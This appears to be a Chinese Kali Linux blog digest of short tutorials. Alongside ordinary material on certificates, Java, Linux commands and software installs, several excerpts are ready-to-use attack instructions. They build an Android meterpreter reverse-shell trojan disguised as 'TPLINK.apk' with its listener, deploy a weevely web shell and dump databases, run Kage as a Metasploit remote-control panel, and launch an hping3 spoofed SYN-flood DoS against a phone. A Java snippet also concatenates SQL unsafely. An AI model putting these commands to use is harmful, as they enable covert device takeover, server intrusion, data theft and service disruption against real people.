建站VPS工具综合杂谈

原因今天网站的证书快要过期了，但是下载下来发现原来的public.pem和chain.pem证书变成了.crt证书。配置老是出现错误，想着能不能将crt转换成pem。 解决方案linux命令 cat your_server1.crt COMODORSADomainValidationSecureServerCA.crt COMODORSAAddTrustCA.crt AddTrustExternalCARoot.crt > your_server2.pem 参数：your_server1.crt 表示你转格式之前的crt格式证书 参数：your_server2.pem 表示转格式之后的pem格式证书

在使用 jd_gui 反编译Java项目， 反编译失败的时候，不妨试试这个工具 Luyten Java Decompiler Gui for Procyon Apache License, Version 2.0 安装方式在github 中下载源码使用 maven编译打包即可 mvn clean install 界面截图

示例代码如下： Connection con = null; //定义一个MYSQL链接对象 Class.forName("com.mysql.jdbc.Driver").newInstance(); //MYSQL驱动 con = DriverManager.getConnection("jdbc:mysql://127.0.0.1:3306/blog", "root", "123456"); //链接本地MYSQL Statement stmt; //创建声明 stmt = con.createStatement(); //update String sql = "Update user Set views='"+b+"' Where cid='"+a+"'"; stmt.executeUpdate(sql);//执行sql语句 JOptionPane.showConfirmDialog(null, "恭喜！数据写入成功！", "温馨提示", JOptionPane.YES_NO_OPTION); co…

文件读取代码如下： package priess; import java.io.BufferedReader; import java.io.File; import java.io.FileReader; public class Mytxt { public static String txt2String(File file){ StringBuilder result = new StringBuilder(); try{ BufferedReader br = new BufferedReader(new FileReader(file));//构造一个BufferedReader类来读取文件 String s = null; while((s = br.readLine())!=null){//使用readLine方法，一次读一行 result.append(System.lineSeparator()+s); } br.close(); }catch(Exception e){ e.printStackTrace(); } return result.toString(); } public static void main…

效果 java代码import java.awt.BorderLayout; import java.awt.Component; import java.awt.EventQueue; import javax.swing.JFrame; import javax.swing.JPanel; import javax.swing.border.EmptyBorder; import javax.swing.JLabel; import javax.swing.JOptionPane; import java.awt.Font; import javax.swing.JButton; import java.awt.event.ActionListener; import java.awt.event.ActionEvent; import java.awt.Color; import javax.swing.JTabbedPane; import javax.swing.ImageIcon; public class love extends JFrame { /** * */ private static final long serialVersionUID = 5430219520645185275L; private JPanel contentPane; protected Component frame; /** * Launch the ap…

jsoup 是一款Java 的HTML解析器，可直接解析某个URL地址、HTML文本内容。它提供了一套非常省力的API，可通过DOM，CSS以及类似于jQuery的操作方法来取出和操作数据。import org.jsoup.Jsoup; import org.jsoup.nodes.Document; import org.jsoup.nodes.Element; import org.jsoup.select.Elements; public class Lcy { public static void main(String[] args) { String html = "<a href=\"http://bbskali.cn">kali论坛</a>"; Document doc = Jsoup.parse(html); Elements link = doc.getElementsByTag("a"); Element a = link.get(0); System.out.println(a.attr("href")); } }

Kage，一个把msf变成可视化远控平台的工具。项目地址https://github.com/WayzDev/Kage/ 下载安装点我下载哈~ 下载后，给予运行权限。 启动服务msfrpcd -U msf -P 123456 -a 0.0.0.0 参数说明： -U: 登录kage的账号 -P:登录kage的密码 -a: msf的ip地址（很重要，要是kage和msf在同一台电脑，用0.0.0.0即127.0.0.1） 启动程序 并登陆 ./Kage.0.1.1-beta_linux.AppImage 输入账号和密码 以及对应的端口 登录成功后如下所示 我们可以利用命令生成木马，也可以在平台上生成木马，根据自己的具体情况来看。 配置监听 配置完成后点击创建 在目标端 成功运行生成的木马，查看会话。 各种骚操作系统信息 文件信息 路由信息 装B完成 扯呼~~~

自kali更新到2020版后，默认取消了root用户的登录权限。只能用普通用户登录，这样做的优点在于对于kali的新手，在不懂的部分命令的情况下对系统的损害有所降低，也就说安全性提高了。但是普通用户权限实在太低，习惯了root权限的我们在2020中如何设置登录密码呢？ 重启系统，进入下面这个界面时按E 按↓到linux开头的一行。 修改ro quiet splash为rw quiet splash init=/bin/ 按F10保存后进入单用户模式 执行passwd root命令修改密码 然后重启，便可以用root身份登录了！

Kali Linux 命令有数以千计。而Kali Linux 是一种类似于其他基于 Linux 的操作系统。所以基本的Linux 命令与其命令类似。而新用户学习这些命令的最大问题是记得不清，记得不够系统。本文将从A~Z将常用的用来列举出来。方便小伙伴学习，本文较长建议收藏阅读！微信公众号kali黑客笔记 Kali Linux 中的系统命令Arch 命令您可以使用 arch 命令了解计算机体系结构。Arch 命令打印诸如“i386、i486、i586、alpha、arm、m68k、mips、sparc、x86_64 等”。 Arp 命令ARP 代表地址解析协议，用于查找给定 IPv4 地址的网络邻居的地址。 arp 命令用于显示您的 Kali Linux 系统的 arp 表。您可以在其他 Linux 系统以及 Windows 操作系统上使用此命令。 当然，我们可以利用它完成arp欺骗 arping 命令arping 命令类似于 ping 命令，但它在以太网层上工作。arping 命令给出本地网络中 IP 地址的可达性和往返时间的结果。 arping -i eth0 192.168.123.1 Aspell 命令aspell 是 Kali Linux 中的拼写检查器命令，您可以提供文件名或标准输入中的任何内容来检查拼写错误。 语法： aspell check [options] 文件名 aspell -c bbskali.txtawk 命令awk 命令用于操作数据并以脚本语言生成报告。它允许用户使用变量、数字函数和函数以及逻辑运算符。所以可…

在我们看来，Linux就是全命令行。需要记录很多的命令来实现某个功能。正是这样，也让学习Linux有了一定的门槛。但是你知道吗？Linux中也有很多的有趣命令，当然所有Linux发行版都可以安装运行这些命令！一起来玩耍吧！ sl 命令你会看到一辆火车从屏幕右边开往左边。。。。。。 安装 sudo apt-get install sl 运行 sl 命令有 -alFe几个选项， -a An accident seems to happen. You’ll feel pity for people who cry for help. -l shows little one. -F It flies. -e Allow interrupt by Ctrl+C.可以给别人来个恶作剧，他一敲ls，不知道的肯定很有效果 alias ls=slfortune 命令输出一句话，有笑话，名言什么的 (还有唐诗宋词sudo apt-get install fortune-zh) 安装 sudo apt-get install fortune运行 fortune cowsay 命令用ASCII字符打印牛，羊等动物，还有个cowthink，这个是奶牛想，那个是奶牛说，哈哈，差不多 安装 sudo apt-get install cowsay运行 cowsay "大表哥,牛逼666" cowsay -l查看其它动物的名字，然后-f跟上动物名，如 cowsay -f tux "坑爹啊" 还可以让cowsay说出fortune的内容，就像这样： fortune | co…

在我们使用kali渗透和工作中，有很多的小技巧，你知道吗？本文将给你展示这些技巧，以便你更改的完成所需工作。当然这些技巧适用于其他debian系列的发行版。修改kali Linux时间对于修改时间，我们在安装kali时选择相关的时区即可，只要kali联网，时间会自动更新。如果你不小心设置的错误的时区，或者坐飞机去美利坚搞渗透，那么这时你需要修改你的时间了。 查看当前时区信息 timedatectl显示信息 列出可用时区 timedatectl list-timezones 设置时区 sudo timedatectl set-timezone Africa/Conakry更新时间 sudo timedatectl set-ntp onKali Linux中查找公网IP地址本地IP和公共IP有什么区别？ 如果您的系统已连接到 Internet，那么您很可能在系统上使用了至少两个 IP 地址。一个 IP 地址是系统的本地地址， 另一个IP 地址是 Internet 上的设备可以看到您连接的地址。这是一个可在万维网上路由的 IP 地址，可让您连接到世界各地的其他服务器和路由器。 本地IP我们用ifconfig便可轻易查看 公网IP如何获取呢？ echo $(wget -qO - https://api.ipify.org) 或者 echo $(curl -s https://api.ipify.org) 如何在 Kali Linux 中安装 Java JDK在kali中已经默认安装了java 如需手动安装其他相应的java版本，这时需要我们手动…

查询whois命令 whois www.targe.com 防火墙识别工具：wafw00f 使用： wafw00f targe.com 查看局域网中在线的设备工具：netdiscover 使用： netdiscover -i wlan0

一：生成木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 R > TPLINK.apk二：监听木马msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.0.108 set LPORT 5555 exploit三：视频演示

stacer是一款图形化的垃圾清理和系统管理工具。有进程管理、开机启动项管理、可视化软件安装和卸载。对于不熟悉Linux命令的小白而言是非常友好的。 安装apt-get install stacer多彩的仪表盘 可视化的垃圾扫描 进程管理 开机启动管理 可视化软件卸载 系统源管理 利用命令清理垃圾卸载软件apt-get remove <package-name> apt-get purge <package-name>remove将会删除软件包，但会保留配置文件．purge会将软件包以及配置文件都删除． 找出系统上哪些软件包留下了残余的配置文件 dpkg --list | grep "^rc" 其中第一栏的rc表示软件包已经删除（Remove），但配置文件（Config-file）还在. 现在提取这些软件包的名称． dpkg --list | grep "^rc" | cut -d " " -f 3删除这些软件包 dpkg --list | grep "^rc" | cut -d " " -f 3 | xargs sudo dpkg --purge如果你只想删除某个软件包的配置文件，那么可以使用下面的命令 sudo dpkg --purge <package-name>删除没有用的deb软件安装包sudo apt-get clean sudo apt-get autoclean删除孤立软件包有时候，你用apt-get安装一个软件包时会自动安装其他的依赖．当你删除掉这个软件包时，这些依赖也就没有用处了．这…

WPS是我们常用的一款办公工具，主要用来处理日常工作中的word excle PPT等文档。在kali中如何安装wps呢？下载wps访问wps的官网 https://linux.wps.cn/ 下载deb包 安装执行dpkg -i xxx.deb即可完成安装 双击桌面的wps图标，会有用户协议。同意即可！ 运行双击wps图标，开始你的创作吧！

最近不少小伙伴在群里面讨论怎样安装输入法，其实在论坛中我之前就发布过这篇教程，今天给大家在总结下。 1. 安装fcitxapt-get install fcitxPS:顺利的话会自动安装成功，如果遇到依赖错误，按提示修复或者输入apt-get -f install修复，但是如果提示“依赖xxx，但是xxx将不会被安装”，这一般是源太旧，建议换个其他的源。 2. 安装fcitx-libs-qtapt-get install fcitx-libs-qt 3.安装搜狗输入法去搜狗输入法官网http://pinyin.sogou.com/linux/ 下载自己系统对应版本的输入法安装包。 3.1 安装搜狗输入法cd ~/下载/也可以文件浏览器在定位到下载目录，右击选择在终端中打开 dpkg -i 下载的sogo安装包文件名 嗯，提示错误，因为是部分依赖还没有安装，我们缺什么安装什么就行了。 或者执行命令apt --fix-broken install 然后，我们重新执行下面命令 dpkg -i sogoupinyin_2.2.0.0108_amd64.deb 可以看到，没有报错。证明已经安装成功。 4.启用搜狗输入法终端中输入： im-config 进入输入法配置，选择确定，然后点击是，在弹出来的输入法选择框中选择fcitx，然后确定 。 注销账号，重新登录，然后右上角有个键盘图标，点击选择【设置】，在左下角点击【+】新增输入法 在弹出窗口中取消“仅显示当前预览”复选框，然后搜索Sogou,找到搜狗输入法，点击OK 打开编辑器，“Ctr…

题记本篇文章写个徘徊在刚学习kali的小伙伴。本文将从以下几个方面写起，命令篇，神器篇,渗透测试篇,三个方面讲起。若还有哪些方面没有涉及到，大家在下方留言即可，方便我补充！本文作者逍遥子原创作品，如需转载请先联系作者，同意后方可转载。同时你可以加入QQ交流群：（618207388）或者关注微信公众号kali黑客教学或者kali论坛同步更新！何为kali linuxKali 是一个基于 Debian 的 Linux 发行版。它的目标就是为了简单：在一个实用的工具包里尽可能多的包含渗透和审计工具。 Kali Linux is an open source project that is maintained and funded by Offensive Security, a provider of world-class information security training and penetration testing services. kali安装U盘安装虚拟机安装（推荐）物理机安装树莓派（装逼界的上乘设备） kali安装(vm)配置内存2G(最小)硬盘（20-40G）无线网卡（推荐8187）处理器4核 kali 可以安装图形界面，也可以只用命令行界面。这个根据你的实际情况来看，如果你的设备比较高端，建议安装图形界面，如果设备不高端，建议安装命令界面如树莓派建议安装命令界面。不然图形界面会占用很大的资源。需要注意的是，在kali中两种界面是可以相互切换的。 参考文章： kalilinux的图形界面和文本界面的切换…

网站基本信息收集网站域名、子域名收集域名解析ip查询网站所有人（whois）负责人联系方式网站基于那个CMS搭建 1x01 网站域名子域名收集这里，我们以本站一级域名bbskali.cn为例，简单看看网站子域名信息的收集。这里介绍几个kali中自带的子域名查询工具。 利用dnsmap查询子域名！ dnsmap bbskali.cn 利用fierce查询子域名 fierce -dns bbskali.cn 子域名收集的意义： 假设，我们的主站bbskali.cn通过测试，没有任何可下手的地方。但是我们可以通过旁站的漏洞拿下主站。 ip地址查询查询ip的意义： 通过ip地址，我们可以知道目前的站点开启了哪些端口，以及系统等信息。 方式一：利用ping查询 如，我们要查询www.baidu.com解析到哪个ip地址，执行命令： ping baidu.com当然这种方法针对开启了防PING和加了CDN的域名是无效的。 针对CND域名，我们可以利用国外的VPS去ping，因为大多数站长仅开启了国内的加速。 利用获取到的ip地址，我们利用Nmap扫一波，即可得到当前开启的端口。 whois查找这里，我们可以利用站长工具获取当前站长的相关信息。当然也可以在kali中直接执行whois命令直接获取。 whois baidu.com cms查询方式一：利用云悉查询 方式二：利用kali工具whatweb查询 whatweb 目标 网站目录爬虫通过对网站目录扫描，我们可以得到一些很重要的信息，比如网站的登录后台。 利用dirsearch扫描网站目录 执行命…

Weevely是一个专门为web渗透攻击设计的web shell,由于是用python语言编写的工具，因此支持跨平台可以 任何有python环境的系统上使用。和Windows系统中一款类似的工具(中国菜刀)一样。 安装更新在kali中已经默认安装了weevely 其他类似系统安装执行下面命令即可。 apt-get install weevely -y基础用法生成web shell格式如下： weevely generate <shell密码> <生成目录> 示例： weevely generate 8888 /root/88.php 连接web shell我们需将生成的web shell上传到目标服务器。这里不在详解，需要的伙伴可以阅读博客中类似的文章。 格式如下： weevely <URL> <password> [cmd] 示例： weevely http://192.168.1.2/88.php 8888 查看系统信息所需命令system_info 枚举用户文件枚举用户目录下且有权限的文件,也可用来加载字典。这里我们可以通过:audit_ filesystem ,来查看都支 持搜索哪些类型的用户文件。 查看PHP配置文件所需命令audit_phpconf 高级用法系统提权连接数据库sql_console sql_console -u root -p 12345678 对数据库进行脱裤所需命令：sql_dump sql_dump -dbms mysql tianyuan root 1…

一Tar压缩打包和解压1.1 打包解压打包命令如下（提前在根目录创建好 /backup）： tar-czvf /backup/backup$(date+%Y%m%d%H%M).tar.gz /var/www以上命令是将文件夹 /var/www下所有的文件及子文件夹打包到 /backup目录下，并以时间来命名。 解压命令如下： tar zxvf /backup/backup20200925.tar.gz -C /var/www以上命令是将压缩包解压到 /var/www目录下。 1.2 加密压缩加密压缩如下： tar zcvf - /var/www | openssl des3 -salt -k '123456' -out /backup/backup$(date +%Y%m%d%H%M).tar.gz以上命令是将文件夹 /var/www下所有的文件及子文件夹打包到 /backup目录下，设置了加密密码 123456，并以时间来命名。 加密解压如下： openssl des3 -d -k '123456' -salt -in /backup/backup20200925.tar.gz | tar zxvf - -C /var/www以上命令是将压缩包解压到 /var/www目录下，请替换你的密码。 1.3 Tar参数Tar命令其它的参数说明如下： -c ：create 建立压缩档案的参数； -C ： 创建解压后指定的存储目录； -x ： 解压缩压缩档案的参数； -z ： 是否需要用gzip压缩； -v： 压缩的过程中显示档案； -f：…

vim /etc/apt/sources.list按 i 键，删除里面的内容。粘贴下方的源 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 注意：前面有#号的不要管，那是被注释掉的。 保存后 执行命令 apt-get uodate && apt-get upgrade 原文链接：传送门

攻击过程：你使用hping3执行拒绝服务攻击(即DoS)。你隐藏你的a$$(我是指你的源头IP地址)。你的目标机器看到的将是随机性源头IP地址中的源头，而不是你的IP地址(IP伪装)。你的目标机器会在5分钟里面不堪重负，停止响应。ok，我们进行简单的模拟攻击： 先用nmap扫描内网存活主机 nmap -sP 192.168.1.1/24 我们的攻击目标是智能手机。 输入命令hping -S --flood -V IP 开始攻击 我们来看看攻击的效果 ok 这时候 手机已经呈现断网状态 按下ctrl+c关闭，这时候我们看看发送了多少数据 这个数据包很客观的了。 另外就是隐藏IP攻击目标 命令是这样的： hping3 -S -U --flood -V --rand -source IP怎样防止DOS攻击如果是网站，可以让网站接入CDN加速。

在前面的教程中，我们提到了在树莓派和物理机以及虚拟机中安装kali2020的方法，但是无论是哪种方法，唯一的缺点就是携带不方便。走到哪里都要拿个破电脑，那么有没有更加便携的方法呢？ 设备清单U盘（16G-32G）DiskGeniuskali 2020镜像VM15利用分区工具对U盘分区下载分区工具 DiskGenius 对u盘进行分区。 新建一个1G的活动分区，目的是为了以后也可以用这个U盘来转存一些小文件，小电影。因为Windows是不能识别linux的文件系统的，如果整个盘都用来装系统， 虚拟机安装系统新建一个虚拟机--->经典类型--->安装程序光盘映像文件（iso），加载你准备好的kali-linux-2020.2-amd64.iso 选择镜像文件 选择操作系统类型，因为kali是基于debian开发的，这里我选debian 设置磁盘的容量 点击自定义硬件，点击USB控制器，在右边选择USB3.0，这步比较关键，不然等一下装系统的时候会出现虚拟机识别不到U盘。 利用vm安装接着点击菜单栏上的 虚拟机--->可移动设备--->U盘名称--->连接。然后选择 Graphical install选项，可视化安装，这样比较容易。 接下来就是选择语言，时区这些了，这里就不在说。 重点来了选择磁盘 我们选择U盘，进行安装。 选择所有的分区 接下来，慢慢等待安装。

工欲其事必先利其器，在渗透测试中一份好的工具，是成功与否的关键所在。利用工具我们可以更加快捷的掌握系统中存在那些漏洞。从而完成一系列的渗透测试。 owaspOWASP是一个开源的、非盈利的全球性安全组织，致力于应用软件的安全研究。我们的使命是使应用软件更加安全，使企业和组织能够对应用安全风险做出更清晰的决策。目前OWASP全球拥有250个分部近7万名会员，共同推动了安全标准、安全测试工具、安全指导手册等应用安全技术的发展。 优点方便 简单 kali默认安装支持中文支持sql xxs 等常见的漏洞扫描结果支持导出 扫描速度快支持网站目录爬行niktoNikto是一款开源的（GPL）网页服务器扫描器，它可以对网页服务器进行全面的多种扫描，包含超过3300种有潜在危险的文件CGIs；超过625种服务器版本；超过230种特定服务器问题。 优点扫描速度快 支持网站目录爬行支持常见漏洞的扫描支持结果导出 WapitiWapiti 是另一个基于终端的 Web 漏洞扫描器，它发送 GET 和 POST 请求给目标站点，来寻找漏洞。 我们可以从终端窗口打开 Wapiti，例如： wapiti http://192.168.123.66/ -o wapiti_result -f html -m "-blindsql"我们会扫描 vulnerable_vm 中的 Peruggia 应用，将输出保存为 HTML 格式，保存到wapiti_result目录中，并跳过 SQL 盲注检测。 优点支持多种漏洞的扫描 效率更高支持模块化工具支持ssl攻击 ness…

PyCharm是一个集成的Python开发环境工具。能够调试代码、生成和运行代码。Pycharm是python开发人员不可缺少的神器。环境要求最少 2 GB 内存，建议 8 GB 内存1024x768 最低屏幕分辨率Python 2.7，或 Python 3.5 或更高版本本文将在Kali 2022中进行安装。 下载安装包首先我们到PyCharm的官网下载安装包，https://www.jetbrains.com/pycharm/download/#section=windows 目前，Pycharm提供了三种不同操作系统的版本，这里我们选择KALI作为操作系统，所以点击Linux 选择社区版本，Download 等待下载完成后，我们将其复制到kali中去。 执行下面命令，对文件进行解压。 tar -zxvf pycharm-community-2022.1.3.tar.gz 运行cd bin #进入bin目录 ./同意协议 send anonymous ststistice 完美运行